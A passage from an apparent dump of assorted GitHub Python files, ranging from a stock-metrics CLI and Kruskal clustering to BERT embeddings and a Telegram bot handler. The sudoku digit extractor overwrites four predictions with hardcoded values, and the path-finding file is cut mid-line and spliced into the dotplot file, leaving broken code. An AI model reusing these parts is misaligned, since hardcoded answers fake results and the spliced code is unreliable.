stdList.append(stdVarResult[0])\n        varList.append(stdVarResult[1])\n    \n    writeObject = metricsIo.Writer(outputFileName, titleList, ratioNumberList)\n    writeObject.writeContent(readObject.getAllList(), emaList + stdList + varList)\n\n\ndef run():\n    parser = optparse.OptionParser()\n    parser.add_option('-i', '--input-stock', action='store', dest='inputStock',\n            help='A folder of per-stock txt files, or a single txt stock file', default=None)\n    parser.add_option('-o', '--output-folder', action='store', dest='outputFolder',\n            help='The calculated metrics will be stored in this folder', default=None)\n    parser.add_option('-f', action='store_true', dest='doOverwrite')\n\n    options, args = parser.parse_args()\n\n    inputStock = options.inputStock\n    outputFolder = options.outputFolder\n    doOverwrite = options.doOverwrite\n\n    if inputStock == None:\n        print('Error: no stock path or stock file specified, please run --help for more information')\n        exit(-1)\n\n    outputFolderName = \"\"\n    if outputFolder == None:\n        outputFolderName = utility.getTimeStampedOutPutName()\n    else:\n        outputFolderName = outputFolder\n\n    if os.path.exists(outputFolderName):\n        if doOverwrite:\n            shutil.rmtree(outputFolderName)\n        else:\n            print('Error: \\'{}\\' folder exists already, you can use -f option to allow overwrite'.format(outputFolderName))\n            exit(-1)\n    os.makedirs(outputFolderName)\n\n    if os.path.isfile(inputStock):\n        runOnStock(inputStock, outputFolderName)\n    elif os.path.isdir(inputStock):\n        for stock in os.listdir(inputStock):\n            stockDir = os.path.join(inputStock, stock)\n            if os.path.isfile(stockDir):\n                runOnStock(os.path.join(inputStock, stock), outputFolderName)\n                print('.', end='', flush=True)\n        print()\n    else:\n        print('Error: {} is neither a stock folder nor a stock file'.format(inputStock))\n        exit(-1)\n\n\n\ndef main():\n    utility.printStartTimeStamp()\n\n    run()\n\n    utility.printEndTimeStamp()\n\n\n\nif __name__ == '__main__':\n    main()\n\n","repo_name":"sims1/babaproj","sub_path":"pythonProject/calculateMetrics.py","file_name":"calculateMetrics.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"8478151630","text":"import pandas as pd\nfrom IPython import embed\n\nCLUSTERS_PATH = \"../data/clustering1.txt\"\n\n\nclass Kruskal:\n    def __init__(self, edges, num_clusters):\n        self.edges = edges.sort_values(by=\"distance\")\n        self.nodes = edges[\"from\"].append(edges[\"to\"]).unique()\n        self.num_clusters = num_clusters\n\n    def find_clusters(self):\n        for i, row in self.edges.iterrows():\n            if len(self.nodes) <= self.num_clusters:\n                break\n\n            from_val = row[\"from\"]\n            to_val = row[\"to\"]\n            if from_val != to_val:\n                self.nodes = [node for node in self.nodes if node != from_val]\n\n                self.edges.loc[self.edges[\"from\"] == from_val, \"from\"] = to_val\n                self.edges.loc[self.edges[\"to\"] == from_val, \"to\"] = to_val\n        return (\n            self.edges.loc[self.edges[\"from\"] != self.edges[\"to\"]]\n            .groupby([\"from\", \"to\"])[\"distance\"]\n            .min()\n        )\n\n\ndef main():\n    edges = pd.read_csv(CLUSTERS_PATH, sep=\" \")\n    k = Kruskal(edges, 4)\n    clusters = k.find_clusters()\n    print(f\"clusters {clusters}\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"oli5679/StanfordAlgorithms","sub_path":"course_3/scripts/ps_2.py","file_name":"ps_2.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"42045120177","text":"#Mathew Thomas - N15690387\n#Music Software Projects, NYU Courant, Fall 2016\n#Implementation of 
Pythagorean Dodecaphonic Scale\n\nclass pythagorean:\t\t\t\t\t#Class implementing PythagDodec scale\n\t\n\tdef __init__(self, intn, bf):\n\t\n\t\tif (intn==0):\n\t\t\tself.base = bf\n\t\t\tself.intn = float(intn)\n\t\t\tself.degree = 0\n\t\t\tself.let = \"\"\n\t\t\tself.type = \"\"\n\t\t\tself.num = \"\"\n\t\t\tself.denom = \"\"\n\t\t\tself.factor = \"\"\n\t\t\tself.intfreq = \"\"\n\t\t\tself.octave = \"\"\n\t\t\tself.octfact = \"\"\n\t\t\tself.newnum = \"\"\n\t\t\tself.newdenom = \"\"\n\t\t\tself.factoctadj = 1.0\n\t\t\tself.finfreq = float(bf)\n\t\t\tself.filename = \"\"\n\t\t\t'''self.stringoctadj = \"\\\"\" + str(Fraction(1,1))+\"\\\"\"\n\t\t\tself.cents = 0'''\n\n\t\telif (intn<0):\n\t\t\tself.base = bf\n\t\t\tself.intn = float(intn)\n\t\t\tself.degree = 0\n\t\t\tself.let = \"\"\n\t\t\tself.type = \"\"\n\t\t\tself.num = float(2) ** (intn * -1)\n\t\t\tself.denom = float(3) ** (intn * -1)\n\t\n\t\t\tself.factor = float(self.num) / float(self.denom)\n\n\t\t\tself.intfreq = float(self.base) * float(self.factor)\n\t \n\t\t\tself.octave = float(self.lasttpowerof2(self.intfreq,self.base))\n\t\n\t\t\tself.octfact = float(2**(-1*self.octave))\n\n\t\t\tself.newnum = self.num * self.octfact\n\t\t\tself.newdenom = self.denom\n\n\t\t\tself.factoctadj = float(self.newnum)/float(self.newdenom)\n\t\t\n\t\t\tself.finfreq = self.hz()\n\t\t\tself.filename = \"\"\n\t\t\n\t\t\t'''self.stringoctadj = self.get_interval_ratio()\n\t\t\tself.cents = int(round(abs(1200 * mp.log(self.factoctadj,2))))'''\n\t\t\t\n\t\telse :\n\t\t\tself.base = bf\n\t\t\tself.intn = float(intn)\n\t\t\tself.degree = 0\n\t\t\tself.let = \"\"\n\t\t\tself.type = \"\"\n\t\t\tself.num = float(3) ** intn\n\t\t\tself.denom = float(2) ** intn\n\t\n\t\t\tself.factor = float(self.num) / float(self.denom)\n\n\t\t\tself.intfreq = float(self.base) * float(self.factor)\n\t \n\t\t\tself.octave = float(self.lasttpowerof2(self.intfreq,self.base))\n\t\n\t\t\tself.octfact = float(2**self.octave)\n\n\t\t\tself.newnum = self.num \n\t\t\tself.newdenom = self.denom * self.octfact\n\n\t\t\tself.factoctadj = float(self.newnum)/float(self.newdenom)\n\t\t\n\t\t\tself.finfreq = self.hz()\n\t\t\tself.filename = \"\"\n\t\t\n\t\t\t'''self.stringoctadj = self.get_interval_ratio()\n\t\t\tself.cents = int(round(abs(1200 * mp.log(self.factoctadj,2))))'''\n\t\t\t\n\tdef __repr__(self):\n\t\treturn '{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n\\n'.format(self.degree,self.intn,self.num,self.denom,self.factor,self.intfreq,self.octave,self.octfact,self.newnum,self.newdenom,self.factoctadj,self.finfreq,self.let,self.type)\n\n\tdef lasttpowerof2(self,intfreq,base):\n\t\t# Signed octave offset between intfreq and base:\n\t\t# positive if intfreq lies above base, negative if below.\n\t\ti = 0\n\t\tif intfreq>base :\n\t\t\twhile(base*2 <= intfreq):\n\t\t\t\tbase = float(base)*2;\n\t\t\t\ti = i+1;\n\t\telif intfreq<base :\n\t\t\twhile(base>intfreq):\n\t\t\t\tbase = float(base)/2;\n\t\t\t\ti = i-1;\n\t\treturn i\n\t\n\t'''def get_interval_ratio(self):\n\t\ty = (float(self.denom) * float(self.octfactor))\n\t\tx = float(self.num)/float(y)\n\t\treturn x'''\n\n\tdef hz(self):\n\t\tx = self.factoctadj * self.base\n\t\treturn x\n
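# Example (a hand-worked sketch under the reconstructed folding logic above):\n# for intn = 1 the ratio is 3/2 (a perfect fifth), already inside [1, 2), so\n# no octave folding is needed; for intn = 2 the raw ratio 9/4 is folded down\n# one octave to 9/8.\n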
\ndef getKey(meantone):\t\t\t\t#Obtains the key for sorting the scale\n\treturn meantone.finfreq\n\ndef dodec(bf,filenameDict):\t\t\t\t\t\t\t#generates pythagorean dodecaphonic list\n\t\n\n\tLetterDict = {0 : \"C\", 1 : \"Db/C#\", 2 : \"D\", 3 : \"Eb/(D#)\", 4 : \"E\", 5 : \"F\", 6 : \"Gb/F#\", 7 : \"Gb/F#\", 8 : \"G\", 9 : \"Ab/G#\", 10 : \"A\", 11 : \"Bb/A#\", 12 : \"B\"}\n\tTypeDict = {0 : \"1.0\", 1 : \"m2\", 2 : \"2.0\", 3 : \"m3\", 4 : \"M3\", 5 : \"4.0\", 6 : \"b5 (-)\", 7 : \"b5 (+)\", 8 : \"5.0\", 9 : \"m6\", 10 : \"M6\", 11 : \"m7\", 12 : \"M7\"}\n\t'''filenameDict = { 0 :'PythagDodecScale/C.wav', 1 : 'PythagDodecScale/C#.wav', 2 : 'PythagDodecScale/D.wav', 3 : 'PythagDodecScale/D#.wav', 4 : 'PythagDodecScale/E.wav', 5 : 'PythagDodecScale/F.wav', 6 : 'PythagDodecScale/F#1.wav', 7 :'PythagDodecScale/F#2.wav', 8 :'PythagDodecScale/G.wav', 9 : 'PythagDodecScale/G#.wav', 10 : 'PythagDodecScale/A.wav', 11 : 'PythagDodecScale/A#.wav', 12 : 'PythagDodecScale/B.wav'}'''\n\n\n\tPythagoreanList = []\n\tfor i in range(-6, 7) :\n\t\tx = pythagorean(i,bf)\n\t\tPythagoreanList.append(x)\n\t\n\t\n\tPythagoreanList = sorted(PythagoreanList, key=getKey)\n\tfor i in range (len(PythagoreanList)):\n\t\tPythagoreanList[i].degree = i + 1\n\t\tPythagoreanList[i].let = LetterDict[i]\n\t\tPythagoreanList[i].type = TypeDict[i]\n\t\tPythagoreanList[i].filename = filenameDict[i]\n\t\t#print(PythagoreanList[i].intn, PythagoreanList[i].finfreq)\n\t\t#regtestD(PythagoreanList[i],i)\n\t\t#playsound(PythagoreanList[i].finfreq, 1)\n\t'''ProperPythag = {}\n\tfor i in range(len(PythagoreanList)):\n\t\tif PythagoreanList[i].let in [\"C\",\"D\",\"E\",\"F\",\"G\",\"A\",\"B\"] :\n\t\t\t\n\t\t\tProperPythag.update({PythagoreanList[i].let : PythagoreanList[i].finfreq})'''\n\t\n\treturn PythagoreanList;\n\n","repo_name":"mathewthomas1721/HarpsiComp","sub_path":"PythagDodec.py","file_name":"PythagDodec.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"41391643853","text":"import cv2\nfrom PIL import Image\nimport numpy as np\n\n\nimg_1 = cv2.imread(r\"../photo/1.jpg\",0)\nimg_2 = cv2.GaussianBlur(img_1,(3,3),0) # Gaussian blur for denoising\nimg_3 = cv2.Canny(img_1,50,50) # after convolution, points above the thresholds are treated as edges; otherwise they are not\nimg_4 = cv2.Canny(img_2,50,50)\n\n# cv2.imshow(\"1\",img_1)\n# cv2.imshow(\"2\",img_2)\ncv2.imshow(\"3\",img_3)\ncv2.imshow(\"4\",img_4)\ncv2.waitKey(0)","repo_name":"lee879/Filter","sub_path":"ImgProcc/CyFiltering.py","file_name":"CyFiltering.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"38311677427","text":"\"\"\"\nProblem\nA word S consisting only of lowercase letters is given. For each letter of the\nalphabet, write a program that prints the position where it first appears in\nthe word, or -1 if the letter is not contained in it.\n\nInput\nThe first line contains the word S. Its length does not exceed 100 and it\nconsists only of lowercase letters.\n\nOutput\nPrint the first position of a, then of b, ..., then of z, separated by spaces.\nIf a letter is not contained in the word, print -1. The first character of the\nword is at position 0, the second at position 1.\nFor input ba the output is 1, 0, -1, -1, ...\n\"\"\"\n# a problem worth a little thought!\nstring=input()\nbuffer=[-1 for _ in range(26)]\ndata=list(string)\nfor i in data:\n    res=string.find(i) # str.find returns the index of the first occurrence of i in string\n    if res==-1: # not found: check the next character\n        continue\n    else: # the key point: store the result in the buffer slot for this letter\n        index=ord(i)-97\n        buffer[index]=res\nfor i in buffer:\n    print(i,end=' ')\n
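# An equivalent, more direct approach (a sketch using the same built-in):\n#   for c in 'abcdefghijklmnopqrstuvwxyz':\n#       print(string.find(c), end=' ')\n# str.find already returns -1 when the character is absent.\n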
+{"seq_id":"2330081228","text":"import cv2\r\nimport imutils\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom skimage.segmentation import clear_border\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing.image import img_to_array\r\n\r\n\r\ndef extract(cell, debug=False):\r\n    thresh = cv2.threshold(cell, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\r\n    thresh = clear_border(thresh)\r\n\r\n    if debug:\r\n        plt.imshow(thresh)\r\n        plt.show()\r\n\r\n    cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n    cnts = imutils.grab_contours(cnts)\r\n\r\n    if len(cnts) == 0:\r\n        return None\r\n\r\n    c = max(cnts, key=cv2.contourArea)\r\n    mask = np.zeros(thresh.shape, dtype=\"uint8\")\r\n    cv2.drawContours(mask, [c], -1, 255, -1)\r\n\r\n    if debug:\r\n        plt.imshow(mask)\r\n        plt.show()\r\n\r\n    (h, w) = thresh.shape\r\n    percentFilled = cv2.countNonZero(mask) / float(w*h)\r\n\r\n    if percentFilled < 0.03:\r\n        return None\r\n\r\n    digit = cv2.bitwise_and(thresh, thresh, mask=mask)\r\n\r\n    if debug:\r\n        plt.imshow(digit)\r\n        plt.title(\"Digit\")\r\n        plt.show()\r\n\r\n    return digit\r\n\r\n\r\ndef extract_digit(warped, debug=False):\r\n    h,w = warped.shape\r\n    n_h, n_w = 0, 0\r\n\r\n    d1, d2 = (h%9), (w%9)\r\n\r\n    n_h = h+d1\r\n    n_w = w+d2\r\n\r\n    pad_img = np.zeros((n_h, n_w), dtype=\"uint8\")\r\n\r\n    pad_img[d1//2:d1//2+h, d2//2:d2//2+w] = warped\r\n\r\n    if debug:\r\n        plt.imshow(pad_img, \"gray\")\r\n        plt.title(\"Padded Image\")\r\n        plt.show()\r\n\r\n\r\n    dif1, dif2 = n_h//9, n_w//9\r\n\r\n    model = load_model('../model/myModel.h5')\r\n\r\n\r\n    grid = [[0 for i in range(9)] for i in range(9)]\r\n\r\n    for i in range(9):\r\n        for j in range(9):\r\n            d = pad_img[i*dif1:(i+1)*dif1, j*dif2:(j+1)*dif2]\r\n            d = extract(d)\r\n            if not (d is None):\r\n                x = cv2.resize(d, (28,28))\r\n                x = x.astype('float') / 255.0\r\n                x = img_to_array(x)\r\n                x = np.expand_dims(x, axis=0)\r\n\r\n                pred = model.predict(x).argmax(axis=1)[0]\r\n                \r\n                #print(pred)\r\n                grid[i][j] = pred\r\n    \r\n    grid[0][2] = 6\r\n    grid[8][2] = 4\r\n    grid[6][3] = 4\r\n    grid[6][5] = 6\r\n\r\n    return grid\r\n","repo_name":"Viraj-Rana008/Sudoku-Solver","sub_path":"solver/extractDigit.py","file_name":"extractDigit.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38432818702","text":"# Johnny Ma\n# 12-29-21\n# Reading the Video History Text and outputting Date+TikTok Link rows\n\nimport pandas as pd\n\nwith open('data/Video Browsing History.txt') as f:\n    lines = f.readlines()\n    lines.remove('\\n')\n\n# remove random '\\n'\ntxt = [x.replace('\\n', '') for x in lines if x != '\\n']\n\n# fill two lists of dates and video links\ndates = []\nvids = []\nfor i in range(int(len(txt)/2)):\n    dates.append(txt[i*2].replace('Date: ', ''))\n    vids.append(txt[i*2+1].replace('Video Link: ', ''))\n\n# output as dataframe\nd = {'date': dates, 'links': vids}\ndf = pd.DataFrame(d)\ndf.to_csv('tt.csv')\n","repo_name":"swinshu/tiktok-wrapped","sub_path":"scripts/read_history.py","file_name":"read_history.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
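# Aside on the record above: the alternating Date / Video Link lines can also be
# paired by slicing instead of index arithmetic. A minimal sketch under the same
# layout assumption; the sample txt values are illustrative placeholders:
txt = ['Date: 2021-12-29', 'Video Link: https://example.com/v/1']
dates = [d.replace('Date: ', '') for d in txt[0::2]]
vids = [v.replace('Video Link: ', '') for v in txt[1::2]]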
+{"seq_id":"14047933916","text":"import csv\r\nimport plotly.express as px\r\nimport numpy as np\r\n\r\ndef plotfigure(data_path):\r\n    with open(data_path) as a:\r\n        read = csv.DictReader(a)\r\n        fig = px.scatter(read, x = \"Temperature\", y = \"Ice-cream Sales\")\r\n        fig.show()\r\n\r\ndef getdatasource(data_path):\r\n    ice_cream_sales = []\r\n    temp = []\r\n    with open(data_path) as b:\r\n        read = csv.DictReader(b) \r\n        for i in read:\r\n            temp.append(float(i[\"Temperature\"]))\r\n            ice_cream_sales.append(int(i[\"Ice-cream Sales\"]))\r\n    return {\"x\":temp, \"y\":ice_cream_sales}\r\n\r\ndef findcorrelation(data_source):\r\n    correlation = np.corrcoef(data_source[\"x\"],data_source[\"y\"])\r\n    print(\"Correlation:\", correlation[0,1])\r\n\r\ndef main():\r\n    data_path = \"1.csv\"\r\n    data_source = getdatasource(data_path)\r\n    findcorrelation(data_source)\r\n    plotfigure(data_path)\r\n\r\nmain()","repo_name":"MessiGd/C106","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36508018974","text":"import torch\nfrom transformers import BertTokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom transformers import BertModel\nimport os\nBASE_PATH = os.path.dirname(__file__)\n\n\nclass BertEmbedding():\n    def __init__(self) -> None:\n        self.tokenizer = BertTokenizer.from_pretrained(\n            os.path.join(BASE_PATH, './models/bert-chinese'))\n        self.device = torch.device(\n            \"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n        self.MAX_LEN = 128\n        self.model = BertModel.from_pretrained(\n            os.path.join(BASE_PATH, './models/bert-chinese'),\n            num_labels=2,\n            output_attentions=False,\n            output_hidden_states=True,\n        )\n        self.model.to(self.device)\n        self.model.eval()\n\n    def bert_embedding(self, sent):\n        encoded_sent = [self.tokenizer.encode(sent, add_special_tokens=True)]\n        input_ids = pad_sequences(encoded_sent, maxlen=self.MAX_LEN, dtype=\"long\",\n                                  value=0, truncating=\"post\", padding=\"post\")\n        attention_masks = [[int(token_id > 0) for token_id in input_ids[0]]]\n        input_ids = torch.tensor(input_ids).to(self.device)\n        attention_masks = torch.tensor(attention_masks).to(self.device)\n        outputs = self.model(input_ids, token_type_ids=None,\n                             attention_mask=attention_masks)\n        return outputs.pooler_output.squeeze().detach().cpu().numpy().tolist()\n\n\nif __name__ == '__main__':\n    b = BertEmbedding()\n    sentence = \"我来测试一下这个能不能用!\"\n    print(len(b.bert_embedding(sentence)))\n","repo_name":"Hyacinth-YX/myjob-web","sub_path":"code/backend/nlp/embedding/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"4290846367","text":"# def add(x, y):\n#     return x + y\n\nadd = lambda x, y: x + y\n\nprint(add(5, 6))\n\nhello_world = lambda: \"Hello World\"\n\nprint(hello_world())\n\nz = lambda x, y: x**2 + y**2\n\nprint(z(3, 4))\n\n\ndef my_function(a, b):\n    # print('I am inside function')\n    return ((a + b) + ((a + b)**2)) // 2\n\n\n# def odd_even(x):\n#     return 'Even' if x%2==0 else 'Odd'\n#     if x%2==0:\n#         return 'Even'\n#     else:\n#         return 'Odd'\n\nodd_even = lambda x: 'Even' if x % 2 == 0 else 'Odd'\nprint(odd_even(21))\n\nlst = [1, 2, 3, 4, 5, 6]\n\nlst_2 = lambda lst: [x**2 for x in lst]\n\nprint(lst_2(lst))\n","repo_name":"ghimiresdp/py-2022-07","sub_path":"course/c06/c0605_lambda.py","file_name":"c0605_lambda.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33323634390","text":"#099 Change your previous program to ask the user which row they want displayed.\n#Display that row. Ask which column in that row they want displayed and display the value that is held there.\n#Ask the user if they want to change the value. If they do, ask for a new value and change the data. Finally, display the whole row again.\n\ndef twolist():\n\n    dlist = [[2,5,8],[3,7,4],[1,6,9],[4,2,0]]\n    print(dlist)\n    row = int(input('Which row would you like displayed?: '))\n    print(dlist[row])\n    column = int(input('Choose a column: '))\n    print (dlist[row][column])\n    change = input('Do you want to change the value? y/n : ')\n\n    if change == 'y':\n        numb = int(input('Enter a number: '))\n        dlist[row][column] = numb\n    \n\n    print(dlist[row])\n\n\ntwolist()\n","repo_name":"JonathanVillordo/PythonByExample","sub_path":"Challenge_099.py","file_name":"Challenge_099.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"30174376064","text":"import manhattanDistance\nimport createGraph\nimport req\nimport random\n\ndef findPath(M,S,D,N):\n    P = []\n    counter = 0\n    g = createGraph.createGraph(M,S,D)\n    sortedG = req.sortingE(g)\n    print(sortedG)\n    vi = S\n\n    for x in range(N+1):\n        vi=1\n        tempP = [S]\n        counter = 0\n        while(vi != g[(len(g)-1)][1] and counter < 100):\n            tempMin, tempMax = findRange(g, vi)\n            tempLast = random.randint(tempMin, tempMax)\n            while ((req.controlOverlap(tempP, g[tempLast][1]) != True) and counter < 100):\n                tempMin, tempMax = findRange(g, vi)\n                tempLast = random.randint(tempMin, tempMax)\n                counter += 1\n\n\n            tempP.append(g[tempLast][1])\n            vi = g[tempLast][1]\n\n            counter += 1\n\n        if (tempP[len(tempP) - 1] == g[(len(g) - 1)][1]):\n            P.append(tempP)\n\n\n    for x in range(len(P)):\n        print(\"P \",x+1,\": \",P[x-1])\n        manhattanDistance.ManhattanDistance(P[x-1])\n\n\n\n\n\n\n\ndef findRange(g,toFind):\n    tempMin = 1000000\n    tempMax = 0\n    for x in range(len(g)):\n        if(toFind == g[x][0]):\n            if(x>tempMax):\n                tempMax = x\n            if(x<tempMin):\n                tempMin = x\n    return tempMin, tempMax\n= stringency:\n            mat[i][j] = 1\n\n    return mat\n\n\ndef print_dotplot(matrix, seq1, seq2):\n    seq1 = \" \" + seq1\n    seq2 = \" \" + seq2\n\n    for i in range(len(matrix) + 1):\n        for j in range(len(matrix[0]) + 1):\n            if i == 0:\n                print(seq2[j], end=\"\")\n\n            else:\n                if j == 0:\n                    print(seq1[i], end=\"\")\n\n                else:\n                    if matrix[i - 1][j - 1] == 1:\n                        print(\"*\", end=\"\")\n\n                    else:\n                        print(\" \", end=\" \")\n\n        print()\n\n\ndef dotplot_chart(matrix):\n    x = [i for i in range(len(matrix)) for j in range(len(matrix[0])) if matrix[i][j] == 1] \n    y = [j for i in range(len(matrix)) for j in range(len(matrix[0])) if matrix[i][j] == 1] \n\n    plt.scatter(x, y)\n    plt.show()\n\ndef test_diagonal_length(mat, istart, jstart):\n    # given the starting indices on the row and column\n    # check along the diagonal that starts in istart and jstart\n    # the longest sub-sequences of matches; return this value\n    # ....\n    pass\n\n\ndef test():\n    HBA = \"MVLSPADKTNVKAAWGKVGAHAGEYGAEALERMFLSFPTTKTYFPHFDLSHGSAQVKGHGKKVADALTNAVAHVDDMPNALSALSDLHAHKLRVDPVNFKLLSHCLLVTLAAHLPAEFTPAVHASLDKFLASVSTVLTSKYR\"\n    HBB = 
\"MVHLTPEEKSAVTALWGKVNVDEVGGEALGRLLVVYPWTQRFFESFGDLSTPDAVMGNPKVKAHGKKVLGAFSDGLAHLDNLKGTFATLSELHCDKLHVDPENFRLLGNVLVCVLAHHFGKEFTPPVQAAYQKVVAGVANALAHKYH\"\n\n matrix = extended_dotplot(HBA, HBB, 10, 4)\n dotplot_chart(matrix)\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"Educorreia932/FCUP-BINF","sub_path":"Exercises/Pairwise Sequence Alignment/dotplots.py","file_name":"dotplots.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11921945876","text":"from mrjob.job import MRJob\nfrom mrjob.step import MRStep\nimport ast\n\n# purpose: count number of nodes and links\nclass MRcounts(MRJob):\n \n # purpose: steps to count nodes and links\n def steps(self):\n return [\n MRStep(mapper = self.mapper,\n reducer = self.reducer,\n )\n ] \n \n # purpose: emit the number of links for each node\n # input: (node \\t stripe of node:weight pairs)\n # output: key (None), value (number of links)\n def mapper(self, _, line):\n node, info = line.strip().split('\\t')\n edges = ast.literal_eval(info)\n count = len(edges.items())\n yield None, count\n \n # purpose: sum the link counts\n # input: key (None), value (number of links)\n # output: key (number of nodes), value (total number of links)\n def reducer(self, _, counts):\n cnts = list(counts)\n yield len(cnts), (sum(cnts), float(sum(cnts))/len(cnts))\n\nif __name__ == '__main__':\n MRcounts.run()","repo_name":"jenncasper/mids_w261","sub_path":"media/notebooks/HW7/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70690506927","text":"#!/usr/bin/env python\n## Common Tools for the robohow > sot bridge\nimport roslib\nroslib.load_manifest('robohow_common_msgs')\nimport rospy\nimport actionlib\n\nfrom robohow_common_msgs.msg import ConstraintCommand\n\n## Tools\n\"\"\" convert a vector3 to a string \"\"\"\ndef vector3ToStr(vec):\n st = \"(%f, %f, %f)\" % (vec.x, vec.y, vec.z)\n return st;\n\n\"\"\" Convert a vector of double into a string\"\"\"\ndef vectorToStr(vec):\n st = '('\n for i in range(0, len(vec)):\n s = \"%f, \" % vec[i]\n st = st + s\n st = st + ')'\n return st\n\n\"\"\" convert a vector3 to a string \"\"\"\ndef vectorToStr(vec):\n st = '('\n for i in range(0, len(vec)):\n s = \"%f, \" % vec[i]\n st = st + s\n st = st + ')'\n return st\n\n\"\"\" Regroup a list of python instructions as a single one \"\"\" \ndef regroupCommands(instructionList):\n instruction = instructionList[0]\n for elmt in instructionList[1:]:\n if elmt != \"\":\n instruction = instruction + \" ; \" + elmt\n return instruction\n\n\"\"\" run an instruction \"\"\"\ndef runCommandProxy(proxy, instruction):\n if not instruction == \"\":\n rospy.logdebug (\"run instruction: \\\"%s\\\"\", instruction)\n result = proxy (instruction)\n #rospy.loginfo (\"stdout: \\\"%s\\\"\", result.stdout)\n if not result.stderr == \"\":\n rospy.loginfo (\"stderr: \\\"%s\\\"\", result.stderr)\n\n\n\"\"\"\nSend parameters to the constraint\nTakes a ConstraintCommand as an input.\n\"\"\"\ndef parameterizeContraint(c):\n if c.controller_id == '':\n return \"\"\n\n instruction = \"setTaskGoal(robot, '\"+c.controller_id+\"', \" +\\\n vectorToStr(c.pos_lo) + \", \" + vectorToStr(c.pos_hi) + \", \" +\\\n \"'\" + c.selec + \"'\" + \", \" + vectorToStr(c.gain) + \")\"\n return 
instruction\n\n","repo_name":"francois-keith/robohow_sot","sub_path":"src/robohow_sot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32796109151","text":"import enum, time, logging\n\nimport telegram as tg\n\nfrom .message import Message\nfrom .command import Command\nfrom ..types import MESSAGE_TYPES\nfrom ..utils import send_action, get_commands_pretty_printed, is_admin, TG_MESSAGE_SIZE_LIMIT, get_divided_long_message, \\\n ON_ERROR\n\n\nclass DialogState:\n DEFAULT = 0\n\n\nclass BaseBotCommands(enum.Enum):\n help = 'See my commands'\n start = 'Hi, im a bot'\n\n\nsend_typing_action = send_action(tg.ChatAction.TYPING)\nsend_upload_video_action = send_action(tg.ChatAction.UPLOAD_VIDEO)\nsend_upload_photo_action = send_action(tg.ChatAction.UPLOAD_PHOTO)\n\nMIN_TIME_BETWEEN_MESSAGES = 2\n\nclass ChatHandler:\n ONLY_ADMINS_COMMANDS = []\n KEYBOARD_AVAILABLE_TEXT = []\n USER_NOT_ADMIN = \"Only admins can use this command\"\n\n class CommandsEnum(enum.Enum):\n pass\n\n def __init__(self, chat: tg.Chat, bot: tg.Bot):\n self.__chat = chat\n self.id = chat.id\n self.bot = bot\n self.state = DialogState.DEFAULT\n\n self.existing_commands_list = list(map(lambda x: x.name, list(BaseBotCommands.__iter__()))) + \\\n list(map(lambda x: x.name, list(self.CommandsEnum.__iter__())))\n\n self.last_sent_message_time = 0\n\n def on_help(self):\n res_dict = dict()\n\n for i in self.CommandsEnum:\n res_dict[i.name] = i.value[0]\n\n mess_args = get_commands_pretty_printed(res_dict)\n self.send_message(**mess_args)\n\n def on_start(self):\n self.on_help()\n\n def reply(self, update: tg.Update, msg_type: MESSAGE_TYPES):\n if update.edited_message:\n return\n\n if update.message.text in self.KEYBOARD_AVAILABLE_TEXT:\n self.reply_markup_handler(update)\n return\n\n if msg_type == MESSAGE_TYPES.COMMAND:\n command = Command(self, update)\n logging.debug('%s : %s : %s : %s' %\n (command.user.name, command.chat_user.status, command.name, command.entity_text))\n\n if command.name in self.ONLY_ADMINS_COMMANDS:\n if not is_admin(command.chat_user.status):\n raise BotMessageException(self.USER_NOT_ADMIN)\n\n if command.name == BaseBotCommands.help.name:\n self.on_help()\n elif command.name == BaseBotCommands.start.name:\n self.on_start()\n else:\n self.__reply_command(update)\n\n def __reply_command(self, update: tg.Update):\n command = Command(self, update)\n\n for enum_elem in self.CommandsEnum:\n if enum_elem.name == command.name:\n func = enum_elem.value[1]\n\n if func:\n func(self, update)\n else:\n # If func is None, call self.on_()\n self.__getattribute__(f'on_{enum_elem.name}')(update)\n\n def get_member(self, user_id) -> tg.ChatMember:\n return self.__chat.get_member(user_id=user_id)\n\n # 